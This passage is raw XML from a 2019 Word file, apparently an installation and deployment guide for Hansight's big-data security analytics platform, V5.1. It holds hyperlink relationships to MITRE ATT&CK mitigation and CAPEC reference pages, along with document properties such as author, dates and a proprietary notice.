Target="https://attack.mitre.org/mitigations/M1031" TargetMode="External"/><Relationship Id="rId244" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1031" TargetMode="External"/><Relationship Id="rId245" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1020" TargetMode="External"/><Relationship Id="rId246" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1031" TargetMode="External"/><Relationship Id="rId247" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1030" TargetMode="External"/><Relationship Id="rId248" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1031" TargetMode="External"/><Relationship Id="rId249" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1037" TargetMode="External"/><Relationship Id="rId60" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://capec.mitre.org/data/definitions/551.html" TargetMode="External"/><Relationship Id="rId61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://capec.mitre.org/data/definitions/550.html" TargetMode="External"/><Relationship Id="rId62" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1035" TargetMode="External"/><Relationship Id="rId63" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1042" TargetMode="External"/><Relationship Id="rId64" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1051" TargetMode="External"/><Relationship Id="rId65" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://capec.mitre.org/data/definitions/159.html" TargetMode="External"/><Relationship Id="rId66" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1022" TargetMode="External"/><Relationship Id="rId67" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1018" TargetMode="External"/><Relationship Id="rId68" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf" TargetMode="External"/><Relationship Id="rId69" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1031" TargetMode="External"/><Relationship Id="rId160" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1037" TargetMode="External"/><Relationship Id="rId161" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://capec.mitre.org/data/definitions/158.html" TargetMode="External"/><Relationship Id="rId162" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1041" TargetMode="External"/><Relationship Id="rId163" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1032" TargetMode="External"/><Relationship Id="rId164" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1028" TargetMode="External"/><Relationship Id="rId165" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1047" TargetMode="External"/><Relationship Id="rId166" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1041" TargetMode="External"/><Relationship Id="rId167" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1027" TargetMode="External"/><Relationship Id="rId168" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1017" TargetMode="External"/><Relationship Id="rId169" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header2.xml"/><Relationship Id="rId250" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1031" TargetMode="External"/><Relationship Id="rId251" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1030" TargetMode="External"/><Relationship Id="rId252" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1031" TargetMode="External"/><Relationship Id="rId253" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1028" TargetMode="External"/><Relationship Id="rId254" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1042" TargetMode="External"/><Relationship Id="rId255" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1031" TargetMode="External"/><Relationship Id="rId256" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header3.xml"/><Relationship Id="rId257" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1053" TargetMode="External"/><Relationship Id="rId258" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1053" TargetMode="External"/><Relationship Id="rId259" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1053" TargetMode="External"/><Relationship Id="rId100" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1028" TargetMode="External"/><Relationship Id="rId101" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1026" TargetMode="External"/><Relationship Id="rId102" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://capec.mitre.org/data/definitions/572.html" TargetMode="External"/><Relationship Id="rId103" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://capec.mitre.org/data/definitions/578.html" TargetMode="External"/><Relationship Id="rId104" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1051" TargetMode="External"/><Relationship Id="rId105" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T108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33258;&#23450;&#20041;%20Office%20&#27169;&#26495;\&#28698;&#24605;&#20135;&#21697;&#25991;&#26723;&#27169;&#26495;%20V3.0.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6E953-974C-C248-B8BC-63F02EA95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D:\Documents\自定义 Office 模板\瀚思产品文档模板 V3.0.dotm</Template>
  <TotalTime>1749</TotalTime>
  <Pages>270</Pages>
  <Words>33612</Words>
  <Characters>191590</Characters>
  <Application>Microsoft Macintosh Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>1596</Lines>
  <Paragraphs>449</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <HeadingPairs>
    <vt:vector size="2" baseType="variant">
      <vt:variant>
        <vt:lpstr>标题</vt:lpstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="1" baseType="lpstr">
      <vt:lpstr/>
    </vt:vector>
  </TitlesOfParts>
  <Manager/>
  <Company>Microsoft</Company>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>224753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shenwen</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>wen shen</cp:lastModifiedBy>
  <cp:revision>803</cp:revision>
  <cp:lastPrinted>2019-08-21T05:49:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-05-30T08:21:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-10-06T15:15:00Z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Name">
    <vt:lpwstr>瀚思大数据安全智能分析平台</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="DocumentID">
    <vt:lpwstr>01</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="Version">
    <vt:lpwstr>V5.1</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="5" name="DocumentType">
    <vt:lpwstr>安装部署指南</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="6" name="ManualVersion">
    <vt:lpwstr>01</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="7" name="ReleaseDate">
    <vt:lpwstr>2019-08-21</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="8" name="ProprietaryDeclaration">
    <vt:lpwstr>瀚思科技所有和机密                   版权所有 © 瀚思科技</vt:lpwstr>
  </property>
</Properties>
</file>